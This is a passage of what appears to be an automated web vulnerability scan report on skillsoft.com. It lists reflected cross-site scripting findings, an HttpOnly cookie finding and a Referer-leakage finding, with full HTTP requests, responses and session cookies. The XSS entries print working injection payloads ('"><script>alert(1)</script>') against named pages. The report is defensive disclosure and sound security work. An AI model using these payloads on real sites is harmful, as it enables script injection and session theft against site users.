HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58276
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/sitemap.asp?645e3"><script>alert(1)</script>48088c218f=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.73. http://skillsoft.com/terms.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /terms.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae5e"><script>alert(1)</script>f7badaa9f96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /terms.asp?2ae5e"><script>alert(1)</script>f7badaa9f96=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50308
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/terms.asp?2ae5e"><script>alert(1)</script>f7badaa9f96=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://skillsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET / HTTP/1.1
Host: skillsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46902
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; path=/
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:42:01 GMT
Set-Cookie: BIGipServerSKILLSOFT_COM=748762634.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...

3. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/case_studies.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /about/case_studies.asp?sort=case_study&order=descending HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 117970
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</style>
   
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js"></script>
   <script language="JavaScript" src="http://www.landingpg.com/lp-tracking/lp.js?llid=form"></script>
...[SNIP]...
<span class="spacer"><a target="_top" href="http://www.books24x7.com/books24x7.asp" title="SkillSoft Books24x7 Subsidiary Link" class="s_item">Books24x7</a>
...[SNIP]...
<li><a target="_top" href="http://www.skillsoft.de/" title="Link to SkillSoft Deutsch region offices and partner information.">Deutsch</a>
...[SNIP]...
<li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-irhome" title="Link to SkillSoft's Investor Relations home page.">Investors</a>
...[SNIP]...
<li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-calendar" title="Link to a calendar of webinars and recordings of SkillSoft finacial announcements for investors.">Calendar</a>
...[SNIP]...
<li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-govconduct" title="Link to information on SkillSoft's Corporate Governance including; Board of Directors, Board Committees, Guidelines, Code of Business Conduct and Ethics.">Corporate Governance</a>
...[SNIP]...
<li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-alerts" title="Link to a form for investors to register to receive e-mail alerts whenever certain company information is posted to this site.">e-mail Alerts</a>
...[SNIP]...
<li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-faq" title="Link to investor Frequently Asked Questions (FAQs) about SkillSoft.">FAQs</a></li>
       <li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-irhome" title="Link to SkillSoft Corporate Profile for investors.">Overview</a>
...[SNIP]...
<li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-presentations" title="Link to SkillSoft Corporation Investor Presentation.">Presentations</a>
...[SNIP]...
<li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-news" title="Link to SkillSoft Press Releases.">Press Releases</a>
...[SNIP]...
<li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-inforeq" title="Link to SkillSoft Information Request Form for investors.">Request Information</a>
...[SNIP]...
<li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-sec" title="Link to a searchable listing of SkillSoft's financial filings required by the United States Securities and Exchange Commission (SEC).">SEC Filings</a>
...[SNIP]...
<li><a target="_top" href="http://phx.corporate-ir.net/phoenix.zhtml?c=90584&amp;p=irol-supp" title="Link to SkillSoft Supplemental Financial Data">Supplemental Financial Data</a>
...[SNIP]...
<li><a target="_top" href="http://www.skillsoft.de/" title="Link to SkillSoft Deutsch region offices and partner information.">Deutsch</a>
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.gilbaneco.com/" target="_blank"><img border="0" src="/images/customer_logos/Gilbane_logo.jpg" alt="Gilbane logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.castrol.com/" target="_blank"><img border="0" src="/images/customer_logos/Castrol_logo.jpg" alt="BP Lubricants Americas logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.daveandbusters.com/" target="_blank"><img border="0" src="/images/customer_logos/DB_logo.jpg" alt="Dave &amp; Buster's logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.kochind.com/" target="_blank"><img border="0" src="/images/customer_logos/koch.gif" alt="Koch logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.herc.com/" target="_blank"><img border="0" src="/images/customer_logos/Hercules_logo.jpg" alt="Hercules logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.pscufs.com/" target="_blank"><img border="0" src="/images/customer_logos/PSCU_logo.jpg" alt="PSCU Financial Services logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.axa-financial.com/" target="_blank"><img border="0" src="/images/customer_logos/AXA_logo.jpg" alt="AXA Financial logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.snhu.edu/" target="_blank"><img border="0" src="/images/customer_logos/SNHU_logo.jpg" alt="Southern New Hampshire University logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.chalmers.se/en/" target="_blank"><img border="0" src="/images/customer_logos/Chalmers_logo.jpg" alt="Chalmers University logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.cornell.edu/" target="_blank"><img border="0" src="/images/customer_logos/Cornell_logo.jpg" alt="Cornell University logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.msbcollege.edu/" target="_blank"><img border="0" src="/images/customer_logos/MSB_logo.jpg" alt="Minnesota School of Business, Inc. logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.uiowa.edu/" target="_blank"><img border="0" src="/images/customer_logos/UIowa_logo.jpg" alt="University of Iowa logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.uh.edu/" target="_blank"><img border="0" src="/images/customer_logos/UH-Red.jpg" alt="University of Houston logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.uncw.edu/" target="_blank"><img border="0" src="/images/customer_logos/nvb-UNCW_logo.jpg" alt="University of North Carolina Wilmington logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.bcbsri.com/" target="_blank"><img border="0" src="/images/customer_logos/BCBS_RI.jpg" alt="Blue Cross Blue Shield RI logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.wellpoint.com/" target="_blank"><img border="0" src="/images/customer_logos/WellPoint_logo.jpg" alt="WellPoint logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.cigna.com/" target="_blank"><img border="0" src="/images/customer_logos/CIGNA_logo.jpg" alt="CIGNA logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.christianacare.org/" target="_blank"><img border="0" src="/images/customer_logos/CC-Health-System_logo.jpg" alt="Christiana Care Health System - Leadership logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.christianacare.org/" target="_blank"><img border="0" src="/images/customer_logos/CC-Health-System_logo.jpg" alt="Christiana Care Health System - IT logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.telus.com/" target="_blank"><img border="0" src="/images/customer_logos/TELUS_logo.jpg" alt="TELUS logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.rhi.com/" target="_blank"><img border="0" src="/images/customer_logos/R-H-I_logo.jpg" alt="Robert Half (RHI) logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.census.gov/" target="_blank"><img border="0" src="/images/customer_logos/USCensus_logo.jpg" alt="U.S. Census Bureau logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.llnl.gov/" target="_blank"><img border="0" src="/images/customer_logos/livermore_logo.jpg" alt="Lawrence Livermore National Laboratory logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.army.mil/" target="_blank"><img border="0" src="/images/customer_logos/Army_logo.jpg" alt="U.S. Army logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.af.mil/" target="_blank"><img border="0" src="/images/customer_logos/AirForce_logo.jpg" alt="U.S. Air Force logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.unisys.com/" target="_blank"><img border="0" src="/images/customer_logos/Unisys_logo.jpg" alt="Unisys logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.adp.com/" target="_blank"><img border="0" src="/images/customer_logos/ADP_Red_Logo.jpg" alt="ADP logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.cort.com/" target="_blank"><img border="0" src="/images/customer_logos/CORT_logo.jpg" alt="CORT logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.datatel.com/" target="_blank"><img border="0" src="/images/customer_logos/Datatel_Logo.gif" alt="Datatel logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.CenturyLink.com/" target="_blank"><img border="0" src="/images/customer_logos/CenturyLink_logo.gif" alt="CenturyLink logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.fmglobal.com/" target="_blank"><img border="0" src="/images/customer_logos/FMGlobal.jpg" alt="FM Global logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.infosys.com/" target="_blank"><img border="0" src="/images/customer_logos/infosys_logo.jpg" alt="Infosys logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.infores.com/" target="_blank"><img border="0" src="/images/customer_logos/IRI_logo.jpg" alt="Information Resources, Inc. (IRI) logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.keane.com/" target="_blank"><img border="0" src="/images/customer_logos/Keane_logo.gif" alt="Keane, Inc. logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.pmi.org/" target="_blank"><img border="0" src="/images/customer_logos/PMI_logo.gif" alt="PMI logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.copesan.com/" target="_blank"><img border="0" src="/images/customer_logos/Copesan_logo.jpg" alt="Copesan logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.plunketts.net/" target="_blank"><img border="0" src="/images/customer_logos/Plunkett_logo.jpg" alt="Plunkett's Pest Control logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.sas.com/" target="_blank"><img border="0" src="/images/customer_logos/sas_logo.jpg" alt="SAS logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.yr.com/" target="_blank"><img border="0" src="/images/customer_logos/YoungRubicam_logo.jpg" alt="Young &amp; Rubicam logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.cgi.com/" target="_blank"><img border="0" src="/images/customer_logos/logo_cgi_color.jpg" alt="CGI logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.Wunderman.com/" target="_blank"><img border="0" src="/images/customer_logos/Wunderman_logo.jpg" alt="Wunderman logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.thiess.com.au/" target="_blank"><img border="0" src="/images/customer_logos/Thiess_logo.jpg" alt="Thiess logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.hilton.com/" target="_blank"><img border="0" src="/images/customer_logos/Hilton_logo.jpg" alt="Hilton logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.trcsolutions.com/" target="_blank"><img border="0" src="/images/customer_logos/Thales_logo.jpg" alt="Thales Australia logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.thalesgroup.com.au/" target="_blank"><img border="0" src="/images/customer_logos/TRC_logo.gif" alt="TRC Companies, Inc. logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.economicalinsurance.com/en/" target="_blank"><img border="0" src="/images/customer_logos/TEIG_logo.jpg" alt="The Economical Insurance Group logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.cessna.com/" target="_blank"><img border="0" src="/images/customer_logos/Cessna_logo.jpg" alt="Cessna logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.sita.com/" target="_blank"><img border="0" src="/images/customer_logos/SITA_logo.jpg" alt="SITA logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.delmonte.com/" target="_blank"><img border="0" src="/images/customer_logos/Delmonte_logo.jpg" alt="Del Monte Foods logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.rentacenter.com/" target="_blank"><img border="0" src="/images/customer_logos/RentACenter_logo.gif" alt="Rent-A-Center logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.ricoh-usa.com/" target="_blank"><img border="0" src="/images/customer_logos/Ricoh_logo.jpg" alt="Ricoh Americas Corporation logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.flextronics.com/" target="_blank"><img border="0" src="/images/customer_logos/Flextronics_logo.jpg" alt="Flextronics logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.packagingcorp.com/" target="_blank"><img border="0" src="/images/customer_logos/PCA_logo.jpg" alt="Packaging Corporation of America logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.luxottica.com/" target="_blank"><img border="0" src="/images/customer_logos/Lux_logo.jpg" alt="Luxottica logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.visa.com/" target="_blank"><img border="0" src="/images/customer_logos/Visa_logo.jpg" alt="VISA logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.ing.com/" target="_blank"><img border="0" src="/images/customer_logos/ING_logo.jpg" alt="ING logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.compassweb.com/" target="_blank"><img border="0" src="/images/customer_logos/CompassBank_logo.jpg" alt="Compass Bank logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.pnc.com/" target="_blank"><img border="0" src="/images/customer_logos/PNC_logo.jpg" alt="PNC Financial Services Group logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.rbs.co.uk/" target="_blank"><img border="0" src="/images/customer_logos/RBS_logo.jpg" alt="RBS logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.sesame.co.uk/" target="_blank"><img border="0" src="/images/customer_logos/Sesame_logo.jpg" alt="Sesame logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.standardlife.co.uk/" target="_blank"><img border="0" src="/images/customer_logos/StandardLife_logo.jpg" alt="Standard Life logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.pge.com/" target="_blank"><img border="0" src="/images/customer_logos/PGE_logo.jpg" alt="PG&amp;E logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.scottishwater.co.uk/" target="_blank"><img border="0" src="/images/customer_logos/ScottishWater_logo.gif" alt="Scottish Water logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.e-learningforkids.org/" target="_blank"><img border="0" src="/images/customer_logos/EFK_logo.jpg" alt="e-Learning for Kids logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.wgu.edu/" target="_blank"><img border="0" src="/images/customer_logos/WGU_logo.jpg" alt="Western Governors University logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.healthpartners.com/" target="_blank"><img border="0" src="/images/customer_logos/HPA2C_logo.jpg" alt="HealthPartners logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.humana.com/" target="_blank"><img border="0" src="/images/customer_logos/Humana_logo.jpg" alt="Humana logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.mckesson.com/" target="_blank"><img border="0" src="/images/customer_logos/McKesson_logo.jpg" alt="McKesson logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.sbhcs.com/" target="_blank"><img border="0" src="/images/customer_logos/StBarnabas_logo.jpg" alt="Saint Barnabas Health Care System logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.smith-nephew.com/" target="_blank"><img border="0" src="/images/customer_logos/SmithNephew_logo.jpg" alt="Smith Nephew logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.bupa.co.uk/" target="_blank"><img border="0" src="/images/customer_logos/Bupa_logo.jpg" alt="Bupa logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.nhsnss.org/" target="_blank"><img border="0" src="/images/customer_logos/NSS_logo.jpg" alt="NHS logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.avaya.com/" target="_blank"><img border="0" src="/images/customer_logos/Avaya_logo.jpg" alt="Avaya logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.marconi.com/" target="_blank"><img border="0" src="/images/customer_logos/Marconi_logo.jpg" alt="Marconi logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.tsc.co.uk/" target="_blank"><img border="0" src="/images/customer_logos/TSC_logo.jpg" alt="TSC logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.airwavesolutions.co.uk/" target="_blank"><img border="0" src="/images/customer_logos/Airwave_logo.jpg" alt="Airwave logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.bt.com/" target="_blank"><img border="0" src="/images/customer_logos/BT_logo.jpg" alt="BT logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.kcom.com/" target="_blank"><img border="0" src="/images/customer_logos/KCOM_logo.jpg" alt="KCOM logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.orange.co.uk/" target="_blank"><img border="0" src="/images/customer_logos/orange_logo.jpg" alt="Orange logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.thus.net/" target="_blank"><img border="0" src="/images/customer_logos/thus_logo.jpg" alt="Thus logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.manpower.com/" target="_blank"><img border="0" src="/images/customer_logos/Manpower_logo.jpg" alt="Manpower logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.matrixresources.com/" target="_blank"><img border="0" src="/images/customer_logos/Matrix_logo.jpg" alt="MATRIX logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.chesterfield.gov/" target="_blank"><img border="0" src="/images/customer_logos/Chesterfield_logo.jpg" alt="Chesterfield County, Va. logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.austrade.gov.au/" target="_blank"><img border="0" src="/images/customer_logos/Austrade_logo.jpg" alt="Australian Trade Commission logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.AstraZeneca.com/" target="_blank"><img border="0" src="/images/customer_logos/AstraZeneca_logo.jpg" alt="AstraZeneca logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.merck.com/" target="_blank"><img border="0" src="/images/customer_logos/Merck_logo.jpg" alt="Merck logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.yahoo.com/" target="_blank"><img border="0" src="/images/customer_logos/Yahoo_logo.jpg" alt="Yahoo logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.virginmedia.com/" target="_blank"><img border="0" src="/images/customer_logos/VirginMedia_logo.jpg" alt="Virgin Media logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.csc.com/" target="_blank"><img border="0" src="/images/customer_logos/CSC_logo.jpg" alt="CSC logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.ibm.com" target="_blank"><img border="0" src="/images/customer_logos/IBM_logo.jpg" alt="IBM logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.getronics.com/" target="_blank"><img border="0" src="/images/customer_logos/GET_logo.jpg" alt="Getronics logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.ncr.com/" target="_blank"><img border="0" src="/images/customer_logos/NCR_logo.jpg" alt="NCR logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.SAIC.com/" target="_blank"><img border="0" src="/images/customer_logos/SAIC_logo.gif" alt="SAIC logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.symantec.com/" target="_blank"><img border="0" src="/images/customer_logos/Symantec.jpg" alt="Symantec logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.sqs-uk.com//" target="_blank"><img border="0" src="/images/customer_logos/SQS_logo.jpg" alt="SQS logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.administaff.com/" target="_blank"><img border="0" src="/images/customer_logos/ASF_logo.jpg" alt="Administaff logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.Capgemini.com/" target="_blank"><img border="0" src="/images/customer_logos/Capgemini_logo.jpg" alt="Capgemini logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.hitachiconsulting.com/" target="_blank"><img border="0" src="/images/customer_logos/HitachiConsulting.gif" alt="Hitachi Consulting logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.aegiscomgroup.com/" target="_blank"><img border="0" src="/images/customer_logos/Aegis_logo.jpg" alt="Aegis logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.ceridian.com/myceridian" target="_blank"><img border="0" src="/images/customer_logos/Ceridian_logo.jpg" alt="Ceridian logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.data3.com.au/" target="_blank"><img border="0" src="/images/customer_logos/DataNo3_logo.jpg" alt="Data#3 logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.atosorigin.com/" target="_blank"><img border="0" src="/images/customer_logos/atosorigin_logo.gif" alt="Atos Origin logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.honda.com/" target="_blank"><img border="0" src="/images/customer_logos/Honda_logo.jpg" alt="Honda logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.toyota.com" target="_blank"><img border="0" src="/images/customer_logos/Toyota_logo.jpg" alt="Toyota logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.unigroupinc.com/" target="_blank"><img border="0" src="/images/customer_logos/unigroup_logo.jpg" alt="UniGroup, Inc logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.mayflower.com/moving/" target="_blank"><img border="0" src="/images/customer_logos/Mayflower_logo.jpg" alt="Mayflower Transits logo" align="middle">
...[SNIP]...
<td align="center" style="vertical-align:middle"><a href="http://www.unitedvanlines.com/mover/" target="_blank"><img border="0" src="/images/customer_logos/UnitedVanLines_logo.jpg" alt="United Van Lines logo" align="middle">
...[SNIP]...
